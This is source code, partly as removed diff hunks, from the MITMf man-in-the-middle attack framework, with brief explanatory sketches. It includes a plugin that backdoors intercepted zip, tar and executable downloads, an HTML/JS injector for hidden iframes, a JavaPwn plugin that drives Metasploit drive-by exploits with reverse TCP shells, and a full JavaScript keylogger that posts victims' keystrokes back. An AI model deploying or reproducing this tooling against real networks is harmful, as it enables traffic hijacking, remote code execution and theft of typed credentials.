if self.FatPriority == 'x86':
targetFile = machobin.machobin(FILE=binaryFile,
OUTPUT=os.path.basename(binaryFile),
SHELL=self.MachoIntelx86['SHELL'],
HOST=self.MachoIntelx86['HOST'],
PORT=int(self.MachoIntelx86['PORT']),
SUPPLIED_SHELLCODE=self.MachoIntelx86['SUPPLIED_SHELLCODE'],
FAT_PRIORITY=self.FatPriority
)
result = targetFile.run_this()
elif self.FatPriority == 'x64':
targetFile = machobin.machobin(FILE=binaryFile,
OUTPUT=os.path.basename(binaryFile),
SHELL=self.MachoIntelx64['SHELL'],
HOST=self.MachoIntelx64['HOST'],
PORT=int(self.MachoIntelx64['PORT']),
SUPPLIED_SHELLCODE=self.MachoIntelx64['SUPPLIED_SHELLCODE'],
FAT_PRIORITY=self.FatPriority
)
result = targetFile.run_this()
elif targetFile.mach_hdrs[0]['CPU Type'] == '0x7':
targetFile = machobin.machobin(FILE=binaryFile,
OUTPUT=os.path.basename(binaryFile),
SHELL=self.MachoIntelx86['SHELL'],
HOST=self.MachoIntelx86['HOST'],
PORT=int(self.MachoIntelx86['PORT']),
SUPPLIED_SHELLCODE=self.MachoIntelx86['SUPPLIED_SHELLCODE'],
FAT_PRIORITY=self.FatPriority
)
result = targetFile.run_this()
elif targetFile.mach_hdrs[0]['CPU Type'] == '0x1000007':
targetFile = machobin.machobin(FILE=binaryFile,
OUTPUT=os.path.basename(binaryFile),
SHELL=self.MachoIntelx64['SHELL'],
HOST=self.MachoIntelx64['HOST'],
PORT=int(self.MachoIntelx64['PORT']),
SUPPLIED_SHELLCODE=self.MachoIntelx64['SUPPLIED_SHELLCODE'],
FAT_PRIORITY=self.FatPriority
)
result = targetFile.run_this()
self.patched.put(result)
return
except Exception as e:
print 'Exception', str(e)
mitmf_logger.warning("EXCEPTION IN binaryGrinder %s", str(e))
return None
def tar_files(self, aTarFileBytes, formatt):
"When called will unpack and edit a Tar File and return a tar file"
print "[*] TarFile size:", len(aTarFileBytes) / 1024, 'KB'
if len(aTarFileBytes) > int(self.userConfig['TAR']['maxSize']):
print "[!] TarFile over allowed size"
mitmf_logger.info("TarFIle maxSize met %s", len(aTarFileBytes))
self.patched.put(aTarFileBytes)
return
with tempfile.NamedTemporaryFile() as tarFileStorage:
tarFileStorage.write(aTarFileBytes)
tarFileStorage.flush()
if not tarfile.is_tarfile(tarFileStorage.name):
print '[!] Not a tar file'
self.patched.put(aTarFileBytes)
return
compressionMode = ':'
if formatt == 'gz':
compressionMode = ':gz'
if formatt == 'bz':
compressionMode = ':bz2'
tarFile = None
try:
tarFileStorage.seek(0)
tarFile = tarfile.open(fileobj=tarFileStorage, mode='r' + compressionMode)
except tarfile.ReadError:
pass
if tarFile is None:
print '[!] Not a tar file'
self.patched.put(aTarFileBytes)
return
print '[*] Tar file contents and info:'
print '[*] Compression:', formatt
members = tarFile.getmembers()
for info in members:
print "\t", info.name, info.mtime, info.size
newTarFileStorage = tempfile.NamedTemporaryFile()
newTarFile = tarfile.open(mode='w' + compressionMode, fileobj=newTarFileStorage)
patchCount = 0
wasPatched = False
for info in members:
print "[*] >>> Next file in tarfile:", info.name
if not info.isfile():
print info.name, 'is not a file'
newTarFile.addfile(info, tarFile.extractfile(info))
continue
if info.size >= long(self.FileSizeMax):
print info.name, 'is too big'
newTarFile.addfile(info, tarFile.extractfile(info))
continue
# Check against keywords
keywordCheck = False
if type(self.tarblacklist) is str:
if self.tarblacklist.lower() in info.name.lower():
keywordCheck = True
else:
for keyword in self.tarblacklist:
if keyword.lower() in info.name.lower():
keywordCheck = True
continue
if keywordCheck is True:
print "[!] Tar blacklist enforced!"
mitmf_logger.info('Tar blacklist enforced on %s', info.name)
continue
# Try to patch
extractedFile = tarFile.extractfile(info)
if patchCount >= int(self.userConfig['TAR']['patchCount']):
newTarFile.addfile(info, extractedFile)
else:
# create the file on disk temporarily for fileGrinder to run on it
with tempfile.NamedTemporaryFile() as tmp:
shutil.copyfileobj(extractedFile, tmp)
tmp.flush()
patchResult = self.binaryGrinder(tmp.name)
if patchResult:
patchCount += 1
file2 = "backdoored/" + os.path.basename(tmp.name)
print "[*] Patching complete, adding to tar file."
info.size = os.stat(file2).st_size
with open(file2, 'rb') as f:
newTarFile.addfile(info, f)
mitmf_logger.info("%s in tar patched, adding to tarfile", info.name)
os.remove(file2)
wasPatched = True
else:
print "[!] Patching failed"
with open(tmp.name, 'rb') as f:
newTarFile.addfile(info, f)
mitmf_logger.info("%s patching failed. Keeping original file in tar.", info.name)
if patchCount == int(self.userConfig['TAR']['patchCount']):
mitmf_logger.info("Met Tar config patchCount limit.")
# finalize the writing of the tar file first
newTarFile.close()
# then read the new tar file into memory
newTarFileStorage.seek(0)
ret = newTarFileStorage.read()
newTarFileStorage.close() # it's automatically deleted
if wasPatched is False:
# If nothing was changed return the original
print "[*] No files were patched forwarding original file"
self.patched.put(aTarFileBytes)
return
else:
self.patched.put(ret)
return
def zip_files(self, aZipFile):
"When called will unpack and edit a Zip File and return a zip file"
print "[*] ZipFile size:", len(aZipFile) / 1024, 'KB'
if len(aZipFile) > int(self.userConfig['ZIP']['maxSize']):
print "[!] ZipFile over allowed size"
mitmf_logger.info("ZipFIle maxSize met %s", len(aZipFile))
self.patched.put(aZipFile)
return
tmpRan = ''.join(random.choice(string.ascii_lowercase + string.digits + string.ascii_uppercase) for _ in range(8))
tmpDir = '/tmp/' + tmpRan
tmpFile = '/tmp/' + tmpRan + '.zip'
os.mkdir(tmpDir)
with open(tmpFile, 'w') as f:
f.write(aZipFile)
zippyfile = zipfile.ZipFile(tmpFile, 'r')
#encryption test
try:
zippyfile.testzip()
except RuntimeError as e:
if 'encrypted' in str(e):
mitmf_logger.info('Encrypted zipfile found. Not patching.')
self.patched.put(aZipFile) # hand back the untouched zip so handleResponse() does not block on the queue
return
print "[*] ZipFile contents and info:"
for info in zippyfile.infolist():
print "\t", info.filename, info.date_time, info.file_size
zippyfile.extractall(tmpDir)
patchCount = 0
wasPatched = False
for info in zippyfile.infolist():
print "[*] >>> Next file in zipfile:", info.filename
if os.path.isdir(tmpDir + '/' + info.filename) is True:
print info.filename, 'is a directory'
continue
#Check against keywords
keywordCheck = False
if type(self.zipblacklist) is str:
if self.zipblacklist.lower() in info.filename.lower():
keywordCheck = True
else:
for keyword in self.zipblacklist:
if keyword.lower() in info.filename.lower():
keywordCheck = True
continue
if keywordCheck is True:
print "[!] Zip blacklist enforced!"
mitmf_logger.info('Zip blacklist enforced on %s', info.filename)
continue
patchResult = self.binaryGrinder(tmpDir + '/' + info.filename)
if patchResult:
patchCount += 1
file2 = "backdoored/" + os.path.basename(info.filename)
print "[*] Patching complete, adding to zip file."
shutil.copyfile(file2, tmpDir + '/' + info.filename)
mitmf_logger.info("%s in zip patched, adding to zipfile", info.filename)
os.remove(file2)
wasPatched = True
else:
print "[!] Patching failed"
mitmf_logger.info("%s patching failed. Keeping original file in zip.", info.filename)
print '-' * 10
if patchCount >= int(self.userConfig['ZIP']['patchCount']): # Make this a setting.
mitmf_logger.info("Met Zip config patchCount limit.")
break
zippyfile.close()
zipResult = zipfile.ZipFile(tmpFile, 'w', zipfile.ZIP_DEFLATED)
print "[*] Writing to zipfile:", tmpFile
for base, dirs, files in os.walk(tmpDir):
for afile in files:
filename = os.path.join(base, afile)
print '[*] Writing filename to zipfile:', filename.replace(tmpDir + '/', '')
zipResult.write(filename, arcname=filename.replace(tmpDir + '/', ''))
zipResult.close()
#clean up
shutil.rmtree(tmpDir)
with open(tmpFile, 'rb') as f:
tempZipFile = f.read()
os.remove(tmpFile)
if wasPatched is False:
print "[*] No files were patched forwarding original file"
self.patched.put(aZipFile)
return
else:
self.patched.put(tempZipFile)
return
def handleResponse(self, request, data):
content_header = request.client.headers['Content-Type']
client_ip = request.client.getClientIP()
if content_header in self.zipMimeTypes:
if self.bytes_have_format(data, 'zip'):
mitmf_logger.info("%s Detected supported zip file type!" % client_ip)
process = multiprocessing.Process(name='zip', target=self.zip_files, args=(data,))
process.daemon = True
process.start()
process.join()
bd_zip = self.patched.get()
if bd_zip:
mitmf_logger.info("%s Patching complete, forwarding to client" % client_ip)
return {'request': request, 'data': bd_zip}
else:
for tartype in ['gz','bz','tar']:
if self.bytes_have_format(data, tartype):
mitmf_logger.info("%s Detected supported tar file type!" % client_ip)
process = multiprocessing.Process(name='tar_files', target=self.tar_files, args=(data,))
process.daemon = True
process.start()
process.join()
bd_tar = self.patched.get()
if bd_tar:
mitmf_logger.info("%s Patching complete, forwarding to client" % client_ip)
return {'request': request, 'data': bd_tar}
elif content_header in self.binaryMimeTypes:
for bintype in ['pe','elf','fatfile','machox64','machox86']:
if self.bytes_have_format(data, bintype):
mitmf_logger.info("%s Detected supported binary type!" % client_ip)
fd, tmpFile = mkstemp()
with open(tmpFile, 'w') as f:
f.write(data)
process = multiprocessing.Process(name='binaryGrinder', target=self.binaryGrinder, args=(tmpFile,))
process.daemon = True
process.start()
process.join()
patchb = self.patched.get()
if patchb:
bd_binary = open("backdoored/" + os.path.basename(tmpFile), "rb").read()
os.remove('./backdoored/' + os.path.basename(tmpFile))
mitmf_logger.info("%s Patching complete, forwarding to client" % client_ip)
return {'request': request, 'data': bd_binary}
else:
mitmf_logger.debug("%s File is not of supported Content-Type: %s" % (client_ip, content_header))
return {'request': request, 'data': data}
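
FilePwn above decides whether a response body is worth backdooring by checking magic bytes at a fixed offset (bytes_have_format). A standalone sketch of that check, trimmed to two of the formats from the table above (Python 2, matching the codebase):

MAGIC = {
    'pe':  {'number': 'MZ', 'offset': 0},
    'elf': {'number': '7f454c46'.decode('hex'), 'offset': 0},   # '\x7fELF'
}

def bytes_have_format(data, fmt):
    magic = MAGIC[fmt]
    start = magic['offset']
    return data[start:start + len(magic['number'])] == magic['number']

print bytes_have_format('MZ\x90\x00<rest of a PE>', 'pe')          # True
print bytes_have_format('\x7fELF\x02\x01<rest of an ELF>', 'elf')  # True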

@@ -1,180 +0,0 @@
#!/usr/bin/env python2.7
# Copyright (c) 2014-2016 Marcello Salvati
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
# USA
#
import logging
logging.getLogger("scapy.runtime").setLevel(logging.ERROR) #Gets rid of IPV6 Error when importing scapy
from scapy.all import get_if_addr
import time
import re
import sys
import argparse
from plugins.plugin import Plugin
from plugins.CacheKill import CacheKill
mitmf_logger = logging.getLogger('mitmf')
class Inject(CacheKill, Plugin):
name = "Inject"
optname = "inject"
implements = ["handleResponse", "handleHeader", "connectionMade"]
has_opts = True
desc = "Inject arbitrary content into HTML content"
version = "0.2"
depends = ["CacheKill"]
def initialize(self, options):
'''Called if plugin is enabled, passed the options namespace'''
self.options = options
self.proxyip = options.ip_address
self.html_src = options.html_url
self.js_src = options.js_url
self.rate_limit = options.rate_limit
self.count_limit = options.count_limit
self.per_domain = options.per_domain
self.black_ips = options.black_ips
self.white_ips = options.white_ips
self.match_str = options.match_str
self.html_payload = options.html_payload
if self.white_ips:
temp = []
for ip in self.white_ips.split(','):
temp.append(ip)
self.white_ips = temp
if self.black_ips:
temp = []
for ip in self.black_ips.split(','):
temp.append(ip)
self.black_ips = temp
if self.options.preserve_cache:
self.implements.remove("handleHeader")
self.implements.remove("connectionMade")
if options.html_file is not None:
self.html_payload += options.html_file.read()
self.ctable = {}
self.dtable = {}
self.count = 0
self.mime = "text/html"
def handleResponse(self, request, data):
#We throttle to only inject once every two seconds per client
#If you have MSF on another host, you may need to check prior to injection
#print "http://" + request.client.getRequestHostname() + request.uri
ip, hn, mime = self._get_req_info(request)
if self._should_inject(ip, hn, mime) and (not self.js_src == self.html_src is not None or not self.html_payload == ""):
if hn not in self.proxyip: #prevents recursive injecting
data = self._insert_html(data, post=[(self.match_str, self._get_payload())])
self.ctable[ip] = time.time()
self.dtable[ip+hn] = True
self.count += 1
mitmf_logger.info("%s [%s] Injected malicious html" % (ip, hn))
return {'request': request, 'data': data}
else:
return
def _get_payload(self):
return self._get_js() + self._get_iframe() + self.html_payload
def add_options(self,options):
options.add_argument("--js-url", type=str, help="Location of your (presumably) malicious Javascript.")
options.add_argument("--html-url", type=str, help="Location of your (presumably) malicious HTML. Injected via hidden iframe.")
options.add_argument("--html-payload", type=str, default="", help="String you would like to inject.")
options.add_argument("--html-file", type=argparse.FileType('r'), default=None, help="File containing code you would like to inject.")
options.add_argument("--match-str", type=str, default="</body>", help="String you would like to match and place your payload before. (</body> by default)")
options.add_argument("--preserve-cache", action="store_true", help="Don't kill the server/client caching.")
group = options.add_mutually_exclusive_group(required=False)
group.add_argument("--per-domain", action="store_true", default=False, help="Inject once per domain per client.")
group.add_argument("--rate-limit", type=float, default=None, help="Inject once every RATE_LIMIT seconds per client.")
group.add_argument("--count-limit", type=int, default=None, help="Inject only COUNT_LIMIT times per client.")
group.add_argument("--white-ips", type=str, default=None, help="Inject content ONLY for these ips")
group.add_argument("--black-ips", type=str, default=None, help="DO NOT inject content for these ips")
def _should_inject(self, ip, hn, mime):
if self.white_ips is not None:
if ip in self.white_ips:
return True
else:
return False
if self.black_ips is not None:
if ip in self.black_ips:
return False
else:
return True
if self.count_limit == self.rate_limit is None and not self.per_domain:
return True
if self.count_limit is not None and self.count > self.count_limit:
#print "1"
return False
if self.rate_limit is not None:
if ip in self.ctable and time.time()-self.ctable[ip] < self.rate_limit:
return False
if self.per_domain:
return not ip+hn in self.dtable
#print mime
return mime.find(self.mime) != -1
def _get_req_info(self, request):
ip = request.client.getClientIP()
hn = request.client.getRequestHostname()
mime = request.client.headers['Content-Type']
return (ip, hn, mime)
def _get_iframe(self):
if self.html_src is not None:
return '<iframe src="%s" height=0%% width=0%%></iframe>' % (self.html_src)
return ''
def _get_js(self):
if self.js_src is not None:
return '<script type="text/javascript" src="%s"></script>' % (self.js_src)
return ''
def _insert_html(self, data, pre=[], post=[], re_flags=re.I):
'''
To use this function, simply pass a list of tuples of the form:
(string/regex_to_match,html_to_inject)
NOTE: Matching will be case insensitive unless different flags are given
The pre list will place the match in front of your injected code; the post
list will place the match behind it.
'''
pre_regexes = [re.compile(r"(?P<match>"+i[0]+")", re_flags) for i in pre]
post_regexes = [re.compile(r"(?P<match>"+i[0]+")", re_flags) for i in post]
for i, r in enumerate(pre_regexes):
data = re.sub(r, "\g<match>"+pre[i][1], data)
for i, r in enumerate(post_regexes):
data = re.sub(r, post[i][1]+"\g<match>", data)
return data
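
For reference, here is a minimal standalone sketch of the pre/post matching idea behind _insert_html, assuming only the regex logic (the request/response plumbing is omitted and the script URL is made up):

import re

def insert_html(data, pre=(), post=(), re_flags=re.I):
    # "pre" keeps the matched string in front of the payload;
    # "post" places the payload immediately before the matched string.
    for match_str, payload in pre:
        data = re.compile("(?P<match>" + match_str + ")", re_flags).sub("\\g<match>" + payload, data)
    for match_str, payload in post:
        data = re.compile("(?P<match>" + match_str + ")", re_flags).sub(payload + "\\g<match>", data)
    return data

page = "<html><body>hello</body></html>"
# Default behaviour of the plugin: drop the payload right before </body>.
print(insert_html(page, post=[("</body>", "<script src='http://attacker.example/x.js'></script>")]))
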


@@ -1,252 +0,0 @@
#!/usr/bin/env python2.7
# Copyright (c) 2014-2016 Marcello Salvati
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
# USA
#
import core.msfrpc as msfrpc
import string
import random
import threading
import sys
import logging
from plugins.plugin import Plugin
from plugins.BrowserProfiler import BrowserProfiler
from time import sleep
logging.getLogger("scapy.runtime").setLevel(logging.ERROR) #Gets rid of IPV6 Error when importing scapy
from scapy.all import get_if_addr
requests_log = logging.getLogger("requests") #Disables "Starting new HTTP Connection (1)" log message
requests_log.setLevel(logging.WARNING)
mitmf_logger = logging.getLogger('mitmf')
class JavaPwn(BrowserProfiler, Plugin):
name = "JavaPwn"
optname = "javapwn"
desc = "Performs drive-by attacks on clients with out-of-date java browser plugins"
tree_output = []
depends = ["Browserprofiler"]
version = "0.3"
has_opts = False
def initialize(self, options):
'''Called if plugin is enabled, passed the options namespace'''
self.options = options
self.msfip = options.ip_address
self.sploited_ips = [] #store IPs of already-pwned or non-vulnerable clients so we don't re-exploit them
try:
msfcfg = options.configfile['MITMf']['Metasploit']
except Exception, e:
sys.exit("[-] Error parsing Metasploit options in config file : " + str(e))
try:
self.javacfg = options.configfile['JavaPwn']
except Exception, e:
sys.exit("[-] Error parsing config for JavaPwn: " + str(e))
self.msfport = msfcfg['msfport']
self.rpcip = msfcfg['rpcip']
self.rpcpass = msfcfg['rpcpass']
#Initialize the BrowserProfiler plugin
BrowserProfiler.initialize(self, options)
self.black_ips = []
try:
msf = msfrpc.Msfrpc({"host": self.rpcip}) #create an instance of the msfrpc library
msf.login('msf', self.rpcpass)
version = msf.call('core.version')['version']
self.tree_output.append("Connected to Metasploit v%s" % version)
except Exception:
sys.exit("[-] Error connecting to MSF! Make sure you started Metasploit and its MSGRPC server")
t = threading.Thread(name='pwn', target=self.pwn, args=(msf,))
t.setDaemon(True)
t.start() #start the main thread
def rand_url(self): #generates a random url for our exploits (urls are generated with a / at the beginning)
return "/" + ''.join(random.choice(string.ascii_uppercase + string.ascii_lowercase) for _ in range(5))
def get_exploit(self, java_version):
exploits = []
client_vstring = java_version[:-len(java_version.split('.')[3])-1]
client_uversion = int(java_version.split('.')[3])
for ver in self.javacfg['Multi'].iteritems():
if type(ver[1]) is list:
for list_vers in ver[1]:
version_string = list_vers[:-len(list_vers.split('.')[3])-1]
update_version = int(list_vers.split('.')[3])
if ('*' in version_string[:1]) and (client_vstring == version_string[1:]):
if client_uversion == update_version:
exploits.append(ver[0])
elif (client_vstring == version_string):
if client_uversion <= update_version:
exploits.append(ver[0])
else:
version_string = ver[1][:-len(ver[1].split('.')[3])-1]
update_version = int(ver[1].split('.')[3])
if ('*' in version_string[:1]) and (client_vstring == version_string[1:]):
if client_uversion == update_version:
exploits.append(ver[0])
elif client_vstring == version_string:
if client_uversion <= update_version:
exploits.append(ver[0])
return exploits
def injectWait(self, msfinstance, url, client_ip): #here we inject an iframe to trigger the exploit and check for resulting sessions
#inject iframe
mitmf_logger.info("%s >> now injecting iframe to trigger exploit" % client_ip)
self.html_payload = "<iframe src='http://%s:%s%s' height=0%% width=0%%></iframe>" % (self.msfip, self.msfport, url) #temporarily changes the code that the Browserprofiler plugin injects
mitmf_logger.info('%s >> waiting for ze shellz, Please wait...' % client_ip)
exit = False
i = 1
while i <= 30: #wait max 60 seconds for a new shell
if exit:
break
shell = msfinstance.call('session.list') #poll metasploit every 2 seconds for new sessions
if len(shell) > 0:
for k, v in shell.iteritems():
if client_ip in shell[k]['tunnel_peer']: #make sure the shell actually came from the ip that we targeted
mitmf_logger.info("%s >> Got shell!" % client_ip)
self.sploited_ips.append(client_ip) #target successfully exploited :)
self.black_ips = self.sploited_ips #Add to inject blacklist since box has been popped
exit = True
break
sleep(2)
i += 1
if exit is False: #We didn't get a shell :(
mitmf_logger.info("%s >> session not established after 30 seconds" % client_ip)
self.html_payload = self._get_payload() # restore the payload normally injected by the BrowserProfiler plugin
def send_command(self, cmd, msf, vic_ip):
try:
mitmf_logger.info("%s >> sending commands to metasploit" % vic_ip)
#Create a virtual console
console_id = msf.call('console.create')['id']
#write the cmd to the newly created console
msf.call('console.write', [console_id, cmd])
mitmf_logger.info("%s >> commands sent succesfully" % vic_ip)
except Exception, e:
mitmf_logger.info('%s >> Error occurred while interacting with Metasploit: %s:%s' % (vic_ip, Exception, e))
def pwn(self, msf):
while True:
if (len(self.dic_output) > 0) and self.dic_output['java_installed'] == '1': #only choose clients that we are 100% sure have the java plugin installed and enabled
brwprofile = self.dic_output #self.dic_output is the output of the BrowserProfiler plugin in a dictionary format
if brwprofile['ip'] not in self.sploited_ips: #continue only if the ip has not been already exploited
vic_ip = brwprofile['ip']
mitmf_logger.info("%s >> client has java version %s installed! Proceeding..." % (vic_ip, brwprofile['java_version']))
mitmf_logger.info("%s >> Choosing exploit based on version string" % vic_ip)
exploits = self.get_exploit(brwprofile['java_version']) # get correct exploit strings defined in javapwn.cfg
if exploits:
if len(exploits) > 1:
mitmf_logger.info("%s >> client is vulnerable to %s exploits!" % (vic_ip, len(exploits)))
exploit = random.choice(exploits)
mitmf_logger.info("%s >> choosing %s" %(vic_ip, exploit))
else:
mitmf_logger.info("%s >> client is vulnerable to %s!" % (vic_ip, exploits[0]))
exploit = exploits[0]
#here we check to see if we already set up the exploit to avoid creating new jobs for no reason
jobs = msf.call('job.list') #get running jobs
if len(jobs) > 0:
for k, v in jobs.iteritems():
info = msf.call('job.info', [k])
if exploit in info['name']:
mitmf_logger.info('%s >> %s already started' % (vic_ip, exploit))
url = info['uripath'] #get the url assigned to the exploit
self.injectWait(msf, url, vic_ip)
else: #here we setup the exploit
rand_port = random.randint(1000, 65535) #generate a random port for the payload listener
rand_url = self.rand_url()
#generate the command string to send to the virtual console
#new line character very important as it simulates a user pressing enter
cmd = "use exploit/%s\n" % exploit
cmd += "set SRVPORT %s\n" % self.msfport
cmd += "set URIPATH %s\n" % rand_url
cmd += "set PAYLOAD generic/shell_reverse_tcp\n" #chose this payload because it can be upgraded to a full-meterpreter and its multi-platform
cmd += "set LHOST %s\n" % self.msfip
cmd += "set LPORT %s\n" % rand_port
cmd += "exploit -j\n"
mitmf_logger.debug("command string:\n%s" % cmd)
self.send_command(cmd, msf, vic_ip)
self.injectWait(msf, rand_url, vic_ip)
else:
#this might be removed in the future since newer versions of Java break the signed applet attack (unless you have a valid cert)
mitmf_logger.info("%s >> client is not vulnerable to any java exploit" % vic_ip)
mitmf_logger.info("%s >> falling back to the signed applet attack" % vic_ip)
rand_url = self.rand_url()
rand_port = random.randint(1000, 65535)
cmd = "use exploit/multi/browser/java_signed_applet\n"
cmd += "set SRVPORT %s\n" % self.msfport
cmd += "set URIPATH %s\n" % rand_url
cmd += "set PAYLOAD generic/shell_reverse_tcp\n"
cmd += "set LHOST %s\n" % self.msfip
cmd += "set LPORT %s\n" % rand_port
cmd += "exploit -j\n"
self.send_command(cmd, msf, vic_ip)
self.injectWait(msf, rand_url, vic_ip)
sleep(1)
def finish(self):
'''This will be called when shutting down'''
msf = msfrpc.Msfrpc({"host": self.rpcip})
msf.login('msf', self.rpcpass)
jobs = msf.call('job.list')
if len(jobs) > 0:
print '\n[*] Stopping all running metasploit jobs'
for k, v in jobs.iteritems():
msf.call('job.stop', [k])
consoles = msf.call('console.list')['consoles']
if len(consoles) > 0:
print "[*] Closing all virtual consoles"
for console in consoles:
msf.call('console.destroy', [console['id']])
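
The version-matching idea in get_exploit can be illustrated with a small standalone sketch; the rule entries below are hypothetical and, unlike the real javapwn.cfg handling, each exploit maps to a single version string here:

def is_vulnerable(client_version, rule_version):
    # Split "1.7.0.17" into a base string ("1.7.0") and an update number (17).
    client_base, client_update = client_version.rsplit('.', 1)
    rule_base, rule_update = rule_version.rsplit('.', 1)
    if rule_base.startswith('*'):
        # A leading '*' in the config means "this exact update level only".
        return client_base == rule_base[1:] and int(client_update) == int(rule_update)
    # Otherwise the client counts as vulnerable at that update level or anything older.
    return client_base == rule_base and int(client_update) <= int(rule_update)

# Hypothetical mapping of exploit name -> vulnerable version string:
rules = {'multi/browser/java_jre17_jmxbean': '1.7.0.10',
         'multi/browser/java_atomicreferencearray': '*1.7.0.2'}
print([name for name, ver in rules.items() if is_vulnerable('1.7.0.9', ver)])
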


@@ -1,169 +0,0 @@
#!/usr/bin/env python2.7
# Copyright (c) 2014-2016 Marcello Salvati
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
# USA
#
from plugins.plugin import Plugin
from plugins.Inject import Inject
import logging
mitmf_logger = logging.getLogger('mitmf')
class jskeylogger(Inject, Plugin):
name = "Javascript Keylogger"
optname = "jskeylogger"
desc = "Injects a javascript keylogger into clients webpages"
implements = ["handleResponse", "handleHeader", "connectionMade", "sendPostData"]
depends = ["Inject"]
version = "0.2"
has_opts = False
def initialize(self, options):
Inject.initialize(self, options)
self.html_payload = self.msf_keylogger()
def sendPostData(self, request):
#Handle the plugin output
if 'keylog' in request.uri:
raw_keys = request.postData.split("&&")[0]
keys = raw_keys.split(",")
del keys[0]; del keys[-1]
input_field = request.postData.split("&&")[1]
nice = ''
for n in keys:
if n == '9':
nice += "<TAB>"
elif n == '8':
nice = nice.replace(nice[-1:], "")
elif n == '13':
nice = ''
else:
try:
nice += n.decode('hex')
except:
mitmf_logger.warning("%s ERROR decoding char: %s" % (request.client.getClientIP(), n))
#try:
# input_field = input_field.decode('hex')
#except:
# mitmf_logger.warning("%s ERROR decoding input field name: %s" % (request.client.getClientIP(), input_field))
mitmf_logger.warning("%s [%s] Field: %s Keys: %s" % (request.client.getClientIP(), request.headers['host'], input_field, nice))
def msf_keylogger(self):
#Stolen from the Metasploit module http_javascript_keylogger
payload = """<script type="text/javascript">
window.onload = function mainfunc(){
var2 = ",";
name = '';
function make_xhr(){
var xhr;
try {
xhr = new XMLHttpRequest();
} catch(e) {
try {
xhr = new ActiveXObject("Microsoft.XMLHTTP");
} catch(e) {
xhr = new ActiveXObject("MSXML2.ServerXMLHTTP");
}
}
if(!xhr) {
throw "failed to create XMLHttpRequest";
}
return xhr;
}
xhr = make_xhr();
xhr.onreadystatechange = function() {
if(xhr.readyState == 4 && (xhr.status == 200 || xhr.status == 304)) {
eval(xhr.responseText);
}
}
if (window.addEventListener) {
document.addEventListener('keypress', function2, true);
document.addEventListener('keydown', function1, true);
} else if (window.attachEvent) {
document.attachEvent('onkeypress', function2);
document.attachEvent('onkeydown', function1);
} else {
document.onkeypress = function2;
document.onkeydown = function1;
}
}
function function2(e)
{
srcname = window.event.srcElement.name;
var3 = (window.event) ? window.event.keyCode : e.which;
var3 = var3.toString(16);
if (var3 != "d")
{
andxhr(var3, srcname);
}
}
function function1(e)
{
srcname = window.event.srcElement.name;
id = window.event.srcElement.id;
var3 = (window.event) ? window.event.keyCode : e.which;
if (var3 == 9 || var3 == 8 || var3 == 13)
{
andxhr(var3, srcname);
}
else if (var3 == 0)
{
text = document.getElementById(id).value;
if (text.length != 0)
{
andxhr(text.toString(16), srcname);
}
}
}
function andxhr(key, inputName)
{
if (inputName != name)
{
name = inputName;
var2 = ",";
}
var2= var2 + key + ",";
xhr.open("POST", "keylog", true);
xhr.setRequestHeader("Content-type","application/x-www-form-urlencoded");
xhr.send(var2 + '&&' + inputName);
if (key == 13 || var2.length > 3000)
{
var2 = ",";
}
}
</script>"""
return payload
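
A simplified sketch of how sendPostData above interprets the body this script POSTs to the "keylog" URL; the sample payload is fabricated:

# Fabricated example of a body the injected script would send:
post_data = ",68,65,6c,6c,6f,&&username"

raw_keys, input_field = post_data.split("&&")
keys = raw_keys.split(",")[1:-1]      # the script wraps the key list in leading/trailing commas

typed = ""
for k in keys:
    if k == '9':
        typed += "<TAB>"
    elif k == '8':
        typed = typed[:-1]            # backspace: drop the last decoded character
    elif k == '13':
        typed = ""                    # enter: the buffer is reset
    else:
        typed += chr(int(k, 16))      # ordinary keys arrive as hex character codes
print("Field: %s Keys: %s" % (input_field, typed))   # Field: username Keys: hello
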


@@ -1,105 +0,0 @@
#!/usr/bin/env python2.7
# Copyright (c) 2014-2016 Marcello Salvati
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
# USA
#
"""
Plugin by @rubenthijssen
"""
import sys
import logging
import time
import re
from plugins.plugin import Plugin
from plugins.CacheKill import CacheKill
mitmf_logger = logging.getLogger('mitmf')
class Replace(CacheKill, Plugin):
name = "Replace"
optname = "replace"
desc = "Replace arbitrary content in HTML content"
implements = ["handleResponse", "handleHeader", "connectionMade"]
depends = ["CacheKill"]
version = "0.1"
has_opts = True
def initialize(self, options):
self.options = options
self.search_str = options.search_str
self.replace_str = options.replace_str
self.regex_file = options.regex_file
if (self.search_str is None or self.search_str == "") and self.regex_file is None:
sys.exit("[-] Please provide a search string or a regex file")
self.regexes = []
if self.regex_file is not None:
for line in self.regex_file:
self.regexes.append(line.strip().split("\t"))
if self.options.keep_cache:
self.implements.remove("handleHeader")
self.implements.remove("connectionMade")
self.ctable = {}
self.dtable = {}
self.mime = "text/html"
